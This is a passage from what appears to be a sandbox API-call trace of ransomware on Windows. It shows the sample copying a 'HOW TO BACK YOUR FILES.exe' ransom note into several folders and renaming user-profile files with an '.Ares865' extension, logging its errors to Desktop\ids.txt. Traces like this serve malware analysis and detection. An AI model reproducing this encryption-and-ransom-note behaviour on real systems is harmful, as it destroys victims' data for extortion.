cAlternateFileName="")) returned 0x2ccde8 [0091.650] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.650] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.650] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate" [0091.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0091.650] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0091.650] lstrlenW (lpString="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned 47 [0091.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate" [0091.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.651] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.651] GetLastError () returned 0x0 [0091.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.651] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.651] CloseHandle (hObject=0x120) returned 1 [0091.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.651] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.651] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.651] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.651] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.651] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0091.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0091.651] lstrlenW (lpString="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 56 [0091.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.651] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.652] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.652] GetLastError () returned 0x0 [0091.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.652] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.652] CloseHandle (hObject=0x120) returned 1 [0091.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.652] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.652] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0091.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5f70 | out: hHeap=0x2b0000) returned 1 [0091.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7968 | out: hHeap=0x2b0000) returned 1 [0091.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 29 [0091.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0091.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.653] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.654] GetLastError () returned 0x0 [0091.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.654] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.654] CloseHandle (hObject=0x120) returned 1 [0091.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.654] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0537e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0537e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0091.654] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.654] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.654] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.Ares865") returned 53 [0091.654] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.ares865"), dwFlags=0x1) returned 0 [0091.654] GetLastError () returned 0x20 [0091.654] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1 MoveFileEx error 32\r\n") returned 75 [0091.654] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1 MoveFileEx error 32\r\n") returned 75 [0091.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.655] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x58f1 [0091.655] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x4b, lpOverlapped=0x0) returned 1 [0091.655] CloseHandle (hObject=0x118) returned 1 [0091.655] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.655] CloseHandle (hObject=0x0) returned 0 [0091.655] CloseHandle (hObject=0x0) returned 0 [0091.655] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0091.655] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.655] lstrcmpiW (lpString1="ntuser.dat.LOG2", lpString2="aoldtz.exe") returned 1 [0091.655] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.Ares865") returned 53 [0091.655] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2.ares865"), dwFlags=0x1) returned 0 [0091.655] GetLastError () returned 0x20 [0091.655] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2 MoveFileEx error 32\r\n") returned 75 [0091.655] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2 MoveFileEx error 32\r\n") returned 75 [0091.655] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.656] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x593c [0091.656] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x4b, lpOverlapped=0x0) returned 1 [0091.656] CloseHandle (hObject=0x118) returned 1 [0091.656] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.656] CloseHandle (hObject=0x0) returned 0 [0091.656] CloseHandle (hObject=0x0) returned 0 [0091.656] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0091.656] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.656] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="aoldtz.exe") returned 1 [0091.656] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.Ares865") returned 93 [0091.656] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.ares865"), dwFlags=0x1) returned 0 [0091.656] GetLastError () returned 0x20 [0091.656] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf MoveFileEx error 32\r\n") returned 115 [0091.657] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf MoveFileEx error 32\r\n") returned 115 [0091.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.657] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5987 [0091.657] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x73, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x73, lpOverlapped=0x0) returned 1 [0091.657] CloseHandle (hObject=0x118) returned 1 [0091.657] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.657] CloseHandle (hObject=0x0) returned 0 [0091.657] CloseHandle (hObject=0x0) returned 0 [0091.657] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0091.657] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.657] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="aoldtz.exe") returned 1 [0091.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.Ares865") returned 130 [0091.657] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.ares865"), dwFlags=0x1) returned 0 [0091.658] GetLastError () returned 0x20 [0091.658] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms MoveFileEx error 32\r\n") returned 152 [0091.658] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms MoveFileEx error 32\r\n") returned 152 [0091.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.658] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x59fa [0091.658] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x98, lpOverlapped=0x0) returned 1 [0091.658] CloseHandle (hObject=0x118) returned 1 [0091.658] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.658] CloseHandle (hObject=0x0) returned 0 [0091.658] CloseHandle (hObject=0x0) returned 0 [0091.658] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0091.658] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.658] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="aoldtz.exe") returned 1 [0091.659] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.Ares865") returned 130 [0091.659] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.ares865"), dwFlags=0x1) returned 0 [0091.659] GetLastError () returned 0x20 [0091.659] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms MoveFileEx error 32\r\n") returned 152 [0091.659] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms MoveFileEx error 32\r\n") returned 152 [0091.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0091.659] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5a92 [0091.659] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x98, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x98, lpOverlapped=0x0) returned 1 [0091.659] CloseHandle (hObject=0x118) returned 1 [0091.667] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0091.667] CloseHandle (hObject=0x0) returned 0 [0091.667] CloseHandle (hObject=0x0) returned 0 [0091.667] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0091.667] lstrcmpiW (lpString1="ntuser.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0091.667] lstrcmpiW (lpString1="ntuser.ini", lpString2="aoldtz.exe") returned 1 [0091.667] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.Ares865") returned 48 [0091.667] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.ares865"), dwFlags=0x1) returned 1 [0091.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, 